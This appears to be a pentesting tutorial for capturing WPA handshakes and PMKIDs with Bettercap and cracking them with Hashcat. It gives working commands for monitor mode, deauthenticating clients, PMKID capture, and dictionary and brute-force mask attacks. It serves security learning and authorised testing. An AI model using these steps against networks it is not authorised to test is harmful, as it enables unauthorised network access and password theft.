Wireless Pentesting with Bettercap
This will be a walkthrough used to obtain wireless handshakes and PMKID using Bettercap and crack it using Hashcat
This is for educational purposes and only to be performed on networks you have permission to do so.
My notes on Wireless in general can be found here.
My notes on Hashcat can be found here.
This will require having a WiFi Adapter that supports monitor mode, also known as packet injection.
I myself have and recommend these adapters:
- Alfa AWUS036ACM <– Capable of 2.4GHz and 5GHz
- Alfa AWUS036ACHM <– Capable of 2.4GHz and 5GHz
- Alfa AWUS036ACH <– Capable of 2.4GHz and 5GHz (This more than likely *will* require driver installation)
- Panda Wireless PAU09 N600 <– Capable of 2.4GHz and 5GHz
- Alfa AWUS036NEH
- Alfa AWUS036NH
- Panda Wireless PAU05
- TP-Link TL-WN722N
- Ralink USB WiFi RT5370
Bettercap
Handshake
We need find our interface and put it into monitor mode.
.png)
sudo airmon-ng start (interface name)
.png)
Now we start bettercap selecting our interface
bettercap -iface (interface)
.png)
We begin scanning for networks
wifi.recon on
We can also show the WiFi Manufacturer of the AP
set wifi.show.manufacturer true
wifi.show
.png)
set wifi.recon.channel (Channel)
set net.sniff.verbose true
set net.sniff.output (SSID).pcap
set net.sniff on
events.stream on
At this point we can again, simply wait for a device to connect to the network to obtain the handshake, or we may deauthenticate the network.
wifi.deauth (BSSID)
Once we obtain the handshake, we will see the notification in our event stream
.png)
PMKID
The PMKID method is much simpler method. Just like before, we find our interface, enable monitor mode, start bettercap with that interface.
We begin scanning for networks
wifi.recon on
We can also show the WiFi Manufacturer of the AP
set wifi.show.manufacturer true
wifi.show
To start the PMKID attack we simply run
wifi.assoc (BSSID)
Once we have successfully received the RSN frame containing PMKID and it has been saved in a pcap format
.png)
Hashcracking with Hashcat
We have our PMKID in the .pcap format, we can use hashcat to crack it. First we must use the hcxpcapng tool from HCXtools.
hcxpcapng -o CrackMe (.pcapng file)
.png)
Dictionary
If we want to use a dictionary attack, like using rockyou.txt for example
hashcat -a 0 -w 3 -m 22000 (hash file) (wordlist)
.png)
.png)
Depending on your hardware, the dictionary you chose, and the password, this may take some time. You can press S for a status to see the time time estimated on finishing, as well as the updated Recovered.Total to see the recovered keys.
We can run the same command again with –show appended to the end to see our cracked passwords.
.png)
Brute Force
If we wanted to run a brute force attack rather than a dictionary attack, it’s a similar command
hashcat -a 3 -w 3 -m 22000 (hash file) '?l?l?l?l?l?l?l'
Replace the ?l with whatever we see fit.
* ?l = a-z
* ?u = A-Z
* ?d = 0-9
* ?h = 0-9a-f
* ?H = 0-9A-F
* ?s = !"#$%&'()\*+,-./:;<=>?@\[]^\_\`{|}\~
* ?a = ?l?u?d?s
* ?b = 0x00 - 0xff
This will cover the basics of the hash cracking with hashcat but it can get SO much more advanced with hashcat. Especially when using rules like OneRuleToRuleThemAllStill and modern wordlists like rockyou2021.txt.